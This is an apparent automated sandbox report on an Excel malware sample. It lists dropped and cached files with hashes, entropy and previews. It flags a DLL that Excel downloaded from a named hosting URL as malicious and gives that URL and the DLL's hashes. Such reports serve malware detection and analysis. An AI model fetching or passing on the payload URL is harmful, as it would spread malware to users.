Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):653
Entropy (8bit):5.086648193991206
Encrypted:false
SSDEEP:12:TMHdNMNxfnNrgrenWimI002EtM3MHdNMNxfnNrgrenWimI00OYGe5EtMb:2d6NxtYeSZHKd6NxtYeSZ7YLjb
MD5:F1234F7F79B7D9E31F8B6C63025E3811
SHA1:5FD9C33C7A8EF9EBCB3F7F63EB0ABA654C377E59
SHA-256:9B466C4AE3A7036C9CFCA5B93A06D99C5A4A1B3C943BB179F1A8BFF61316B99A
SHA-512:B8342524CAB80AF233C3F9AF011AA0249CFCFABA6EAE5C07AA6C3869CE153BB87DC962123F5CD13FD361C40B75F65D540C8CCDB5C4D4213886E74AEED20CC8AC
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xbb23f41e,0x01d74044</date><accdate>0xbb23f41e,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xbb23f41e,0x01d74044</date><accdate>0xbb23f41e,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\51B28365-1D64-4B17-A13C-644DC8E32C4F
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):134558
Entropy (8bit):5.368402225187978
Encrypted:false
SSDEEP:1536:DcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:wEQ9DQW+zPXO8
MD5:826DEAE5CC5E9B0F3D6A5B790FEAA3A6
SHA1:A07FBB28E0049DB2F2CE7B3112333030A4D2F070
SHA-256:4EC91949EC3CCE465438CC54E576392E6FEB4E606AFFE72B9193E1F417F41DF2
SHA-512:6875CAF0AC6CE48A3C62DE975F2F9FF813E18BDD38B55B033C78A3F932171573B4941641F3D65C337AC085B8945E5A6A998EDB74248A9F4224BAD57CE7EBEC78
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-03T17:48:11">.. Build: 16.0.14028.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\633836DC.png
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:PNG image data, 240 x 52, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):7197
Entropy (8bit):7.964447218948388
Encrypted:false
SSDEEP:192:DTUaFds32VHjg5vCBadV58kJ+hX5Y+BXj:D4csOjg5qBadV5n0HY+Vj
MD5:D4E702617A12082888A2FD8BB0A2A8AC
SHA1:7F3A85C42B1B6814E3F32AD579BE8DF4CFF825B3
SHA-256:94102F2D952184B98AF8F0459D6B98AE55CD9D1F445F0EA15A4163A6ED3E3579
SHA-512:DE6C3865F994D8A4332CD7F1CE8398FBE37F17E7B7EB650E271D60A832AC1B3FA98C96EDDB6CE6E353876FE7976C4C8FC64E6D724ADB22971F8D3E2290B35942
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AC906D1E.png
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):557
Entropy (8bit):7.343009301479381
Encrypted:false
SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
MD5:A516B6CB784827C6BDE58BC9D341C1BD
SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B005EF51.png
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):8301
Entropy (8bit):7.970711494690041
Encrypted:false
SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
MD5:D8574C9CC4123EF67C8B600850BE52EE
SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CB32712D.jpeg
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 169x94, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9501
                                                                                                                                                                            Entropy (8bit):7.860089169273678
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:aiPAPhNxkAEDE7NsNUlIP252RcxPmvynLdpb0aHhh4mbLD1nvSdIz:aioPh4AmNUf2axeCBx0gh4mtSdIz
                                                                                                                                                                            MD5:D07199047FEA546752A9193766EC22C8
                                                                                                                                                                            SHA1:B7AF4CBD8D8ABD6EBB51F5A2E6F2F42B49802FDF
                                                                                                                                                                            SHA-256:F9372424D6940099390601A593A2E623AD8F04D575D298686A9D92B53B1C3A98
                                                                                                                                                                            SHA-512:8FA1F3E47C116058C08C97EA47CC813630AFF4EA442C8185BB253118F9B0DD80E197FFDAE9F01D83A8216F5AC2D2FC139435A2BFFE628AA99C1AE8BEBDC9A8B2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ......JFIF.............C....................................................................C.......................................................................^...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(....J..#v...5GR.,..).=J.;xm.g..i.$h.K3....O../...../..bO.|&.....-...'.ff`.O...!......).....L.i.E..{}..+...F.$.n..n.....+....F|.......G.../f...h....;cW`.6..$._......_.P.|..x"?......a..I......0{..:K.1$...8]o._.n>...v......M....y...p..y....fy'.<.q.rOJ......E>....kD..Y.?.+a(...Z/T.............>...|Q.i.6...._&.\.m2^4$.........c... ~..7.m'.?...I&.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F6BD7E87.png
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):848
                                                                                                                                                                            Entropy (8bit):7.595467031611744
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                            MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                            SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                            SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                            SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\background_gradient[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                            Entropy (8bit):5.019973044227213
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                            MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                            SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                            SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                            SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bullet[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):447
                                                                                                                                                                            Entropy (8bit):7.304718288205936
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                            MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                            SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                            SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                            SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\httpErrorPagesScripts[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12105
                                                                                                                                                                            Entropy (8bit):5.451485481468043
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                            MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http_404[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):6495
                                                                                                                                                                            Entropy (8bit):3.8998802417135856
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                            MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                            SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                            SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                            SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/http_404.htm
                                                                                                                                                                            Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\info_48[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4113
                                                                                                                                                                            Entropy (8bit):7.9370830126943375
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                            MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                            SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                            SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                            SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):312832
                                                                                                                                                                            Entropy (8bit):6.133421258123313
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:92dsJtFrYUZZqrS6HtYP612U8ZIbBmWMOzWb/0:9SsJtFrYJS6NYy123IMWLz5
                                                                                                                                                                            MD5:5A7C87DAB250CEE78CE63AC34117012B
                                                                                                                                                                            SHA1:554C4CCF2341182768D475087D8A8BCFAA525A12
                                                                                                                                                                            SHA-256:8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
                                                                                                                                                                            SHA-512:3B4BD7963E3C397618562708064674BD2418F5CAB71CE861986EFA3BCD14FA6B0155DAECE10B9A7AD3FE0F7FAC6FDFD693B4AC2451F4EAABB30BA8253286B7ED
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: 4Y2I7k0.xlsb, Detection: malicious, Browse
                                                                                                                                                                            IE Cache URL:http://docs.atu.ngr.mybluehost.me/presentation.dll
                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................................................................Rich...........PE..L....Hn`...........!.................;.......................................P............@.........................`...T.......<.... .......................0..........................................@............................................text............................... ..`.data...Hq..........................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ErrorPageTemplate[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2168
                                                                                                                                                                            Entropy (8bit):5.207912016937144
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                            MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                            SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                            SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                            SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\background_gradient[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                            Entropy (8bit):5.019973044227213
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                            MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                            SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                            SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                            SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                                                            Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\bullet[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):447
                                                                                                                                                                            Entropy (8bit):7.304718288205936
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                            MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                            SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                            SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                            SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\down[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):748
                                                                                                                                                                            Entropy (8bit):7.249606135668305
                                                                                                                                                                            Encrypted:false
